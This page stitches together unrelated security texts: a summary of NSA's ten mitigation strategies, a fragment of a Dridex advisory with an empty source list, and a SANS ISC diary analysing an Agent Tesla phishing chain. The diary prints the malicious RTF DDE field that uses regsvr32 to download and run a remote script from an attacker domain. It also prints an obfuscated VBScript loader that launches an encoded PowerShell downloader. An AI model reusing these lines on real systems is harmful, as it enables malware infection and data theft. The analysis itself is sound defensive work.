The National Security Agency (NSA) recently published its Top Ten Cybersecurity Mitigation Strategies (This is the current website for Top 10 mitigation strategies: https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1). Aligned with the NIST Cybersecurity Framework, the Strategies offer a risk-based approach to mitigating exploitation techniques used by Advance Persistent Threat (APT) actors.

The Strategies counter a broad range of exploitation techniques used by malicious cyber actors. NSA’s mitigations set priorities for enterprise organizations to minimize mission impact. The mitigations also build upon the NIST Cybersecurity Framework functions to manage cybersecurity risk and promote a defense-in-depth security posture. The mitigation strategies are ranked by effectiveness against known APT tactics. Additional strategies and best practices will be required to mitigate the occurrence of new tactics.

  1. Update and Upgrade Software Immediately. Apply all available software updates, automate the process to the extent possible, and use an update service provided directly from the vendor. Automation is necessary because threat actors study patches and create exploits, often soon after a patch is released. These “N-day” exploits can be as damaging as a zero-day. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to assure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender’s patch cycle.
  2. Defend Privileges and Accounts. Assign privileges based on risk exposure and as required to maintain operations. Use a Privileged Access Management (PAM) solution to automate credential management and fine-grained access control. Another way to manage privilege is through tiered administrative access in which each higher tier provides additional access, but is limited to fewer personnel. Create procedures to securely reset credentials (e.g., passwords, tokens, tickets). Privileged accounts and services must be controlled because threat actors continue to target administrator credentials to access high-value assets, and to move laterally through the network.
  3. Enforce Signed Software Execution Policies. Use a modern operating system that enforces signed software execution policies for scripts, executables, device drivers, and system firmware. Maintain a list of trusted certificates to prevent and detect the use and injection of illegitimate executables. Execution policies, when used in conjunction with a secure boot capability, can assure system integrity. Application Whitelisting should be used with signed software execution policies to provide greater control. Allowing unsigned software enables threat actors to gain a foothold and establish persistence through embedded malicious code.
  4. Exercise a System Recovery Plan. Create, review, and exercise a system recovery plan to ensure the restoration of data as part of a comprehensive disaster recovery strategy. The plan must protect critical data, configurations, and logs to ensure continuity of operations due to unexpected events. For additional protection, backups should be encrypted, stored offsite, offline when possible, and support complete recovery and reconstitution of systems and devices. Perform periodic testing and evaluate the backup plan. Update the plan as necessary to accommodate the ever-changing network environment. A recovery plan is a necessary mitigation for natural disasters as well as malicious threats including ransomware.
  5. Actively Manage Systems and Configurations. Take inventory of network devices and software. Remove unwanted, unneeded, or unexpected hardware and software from the network. Starting from a known baseline reduces the attack surface and establishes control of the operational environment. Thereafter, actively manage devices, applications, operating systems, and security configurations. Active enterprise management ensures that systems can adapt to dynamic threat environments while scaling and streamlining administrative operations.
  6. Continuously Hunt for Network Intrusions. Take proactive steps to detect, contain, and remove any malicious presence within the network. Enterprise organizations should assume that a compromise has taken place and use dedicated teams to continuously seek out, contain, and remove threat actors within the network. Passive detection mechanisms, such as logs, Security Information and Event Management (SIEM) products, Endpoint Detection and Response (EDR) solutions, and other data analytic capabilities are invaluable tools to find malicious or anomalous behaviors. Active pursuits should also include hunt operations and penetration testing using well documented incident response procedures to address any discovered breaches in security. Establishing proactive steps will transition the organization beyond basic detection methods, enabling real-time threat detection and remediation using a continuous monitoring and mitigation strategy.
  7. Leverage Modern Hardware Security Features. Use hardware security features like Unified Extensible Firmware Interface (UEFI) Secure Boot, Trusted Platform Module (TPM), and hardware virtualization. Schedule older devices for a hardware refresh. Modern hardware features increase the integrity of the boot process, provide system attestation, and support features for high-risk application containment. Using a modern operating system on outdated hardware results in a reduced ability to protect the system, critical data, and user credentials from threat actors.
  8. Segregate Networks Using Application-Aware Defenses. Segregate critical networks and services. Deploy application-aware network defenses to block improperly formed traffic and restrict content, according to policy and legal authorizations. Traditional intrusion detection based on known-bad signatures is quickly decreasing in effectiveness due to encryption and obfuscation techniques. Threat actors hide malicious actions and remove data over common protocols, making the need for sophisticated, application-aware defensive mechanisms critical for modern network defenses.
  9. Integrate Threat Reputation Services. Leverage multi-sourced threat reputation services for files, DNS, URLs, IPs, and email addresses. Reputation services assist in the detection and prevention of malicious events and allow for rapid global responses to threats, a reduction of exposure from known threats, and provide access to a much larger threat analysis and tipping capability than an organization can provide on its own. Emerging threats, whether targeted or global campaigns, occur faster than most organizations can handle, resulting in poor coverage of new threats. Multi-source reputation and information sharing services can provide a more timely and effective security posture against dynamic threat actors.
  10. Transition to Multi-Factor Authentication. Prioritize protection for accounts with elevated privileges, remote access, and/or used on high value assets. Physical token-based authentication systems should be used to supplement knowledge-based factors such as passwords and PINs. Organizations should migrate away from single factor authentication, such as password-based systems, which are subject to poor user choices and susceptible to credential theft, forgery, and reuse across multiple systems.

 

Contact Information

Reporting Suspected Malicious Activity

To report an intrusion and request resources for incident response or technical assistance, contact CISA (CISAservicedesk@hq.dhs.gov or 888-282-0870), FBI through a local field office (https://www.fbi.gov/contact-us/field-offices), or FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).

Institutions should determine whether filing of a Suspicious Activity Report (“SAR”) is required under Bank Secrecy Act regulations.  In instances where filing is not required, institutions may file a SAR voluntarily to aid FinCEN and law enforcement efforts in protecting the financial sector.  Financial institutions are encouraged to provide relevant cyber-related information and indicators in their SAR reporting.  For questions regarding cyber SAR filing, please contact the FinCEN Resource Center (FRC@fincen.gov or 1-800-767-2825).

Open-Source Reporting On Dridex

The following represents an alphabetized selection of open-source reporting by U.S. government and industry sources on Dridex malware and its derivatives:

 

Revisions

  • December 5, 2019: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

E-mail from Agent Tesla, (Thu, Dec 5th)

This post was originally published on this site

Last Thursday, only a day after Brad wrote a Diary about discovering Agent Tesla sample in Any.Run[1], I found a request for analysis of a suspicious file in my inbox. The file turned out to be the first part of a multi-stage downloader for Agent Tesla and since Brad wrote about what happens after this malware arrives at the target (i.e. data exfiltration using SMTP), I thought that a closer look at what comes before the infection might nicely complete the picture of how the malware operates.

In this campaign, the first stage of the dropper was a file with a DOT extension, sent as an attachment of a phishing e-mail trying to appear as a request for quotation. DOT files are old-type Word templates and since modern Word can still use them and they may contain macros without it being apparent from the extension, they are among the potentially useful file types for macro-based phishing attachments. And since DOT files attached to e-mail messages are nowadays seldom above-board, blacklisting the extension on an e-mail gateway may not be a bad idea to consider.

 

In this case, however, the DOT file wasn’t a Word document at all, but rather a renamed Rich Text File containing nothing but a DDE[2] call intended to download and run a WSC file, containing the second stage of the downloader, using regsvr32.

{rtf1{field{*fldinst*rtf dDEAUto "c:winDoWsSySTEM32cmD.EXE" "/c regSvR32 -S -n /U -i:https://fajr.com/rummz.wsc SCRObj.dll"}}}

 

After opening the DOT file in Word, the usual DDE-related message boxes would jump up at the user and, provided the user would press the right buttons, the WSC file would be downloaded and executed.

 

A WSC (Windows Script Component) file is basically just a script in an XML envelope and although use of this format to spread malicious code is not a new technique[3], it is not overly common either. In the case of the Agent Tesla spreading campaign, the WSC file contained VBscript intended to use  PowerShell to download the Agent Tesla malware itself into the AppData folder as “gifgmimgifg.exe” and then run it.

<?xMl version = " 237654691241.7 " ?>
<scriptlet>
<registration
progid = "q"
classid = "{B28214B5-40E3-4058-856E-B187E918E0A4}" >
<script language="vBsCRIpT">
<![CDATA[
dim zvyhbmmhihovqq : DiM whkfvolnqyynrb : Set zvyhbmmhihovqq = creatEObJECT ( cHr(&h77) & ChR(&h73) & cHr(&h63) & cHR(&H52) & CHrw(&h69) & ChrW(&H70) & chRW(&H74) & CHr(&h2E) & ChR(&h73) & chRW(&h48) & chR(&H65) & Chr(&h6c) & chrw(&h6c) ) : whkfvolnqyynrb = " PoWerSHEll.exe -Ex ByPAss -NOp -W 1 -Ec IAA
...
ABlAB0g " : zvyhbmmhihovqq.run CHr ( 34 ) & zvyhbmmhihovqq.eXpANdeNVironMenTStrInGs( Chr(&H25) & Chr(&H43) & Chr(&H4F) & Chr(&H6D) & Chr(&H53) & Chr(&H70) & ChrW(&H65) & ChrW(&H63) & Chr(&H25) ) & ChR ( 34 ) & chr ( 34 ) & Chr(&H2F) & Chr(&H43) & ChrW(&H20) & whkfvolnqyynrb & chr ( 34 ) , 0 : SEt zvyhbmmhihovqq = nOTHiNG
]]>
</script>
</registration>
</scriptlet>

 

The final executable of Agent Tesla seemed quite similar to the one Brad found – at first glance, there were only two differences. The first was the use of a different e-mail account to upload stolen data. I recorded the following SMTP stream using Any.Run, as the malware didn’t try to exfiltrate any data from my local VM (probably due to some anti-sandboxing measure, although this is a conjecture on my part – the executable was heavily obfuscated and I didn’t have much time to spend on analyzing it).

 

The second difference was in the file the malware was disguised as. This version of Agent Tesla was supposed to look (not counting the icon) as RAMMap, a tool which is part of the SysInternals toolkit.

 

The following chart shows relationships between all the files mentioned in the Diary and under it, you may find all the relevant hashes.

 

PO-0012_doc.dot
MD5 – ba6cc1cbfa2a9ebb006ad22e0c3585ed
SHA1 – aff5bbd13558d9ada120eed34cef778319e65291
 

rummz.wsc
MD5 – d71439df0a524fb1c0c537d9839a8177
SHA1 – 149cbaa8110b153cc69b439b14617a6b8b87af50
 

gifgmimgifg.exe
MD5 – 8fef6028422a91884c5928f6568e4c80
SHA1 – ccf1e3aa6f60304c4888d2d51e56f01b96f7c842

 

[1] https://isc.sans.edu/forums/diary/Finding+an+Agent+Tesla+malware+sample/25554/
[2] https://en.wikipedia.org/wiki/Dynamic_Data_Exchange
[3] https://cofense.com/threat-actors-use-advanced-delivery-mechanism-distribute-trickbot-malware/

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.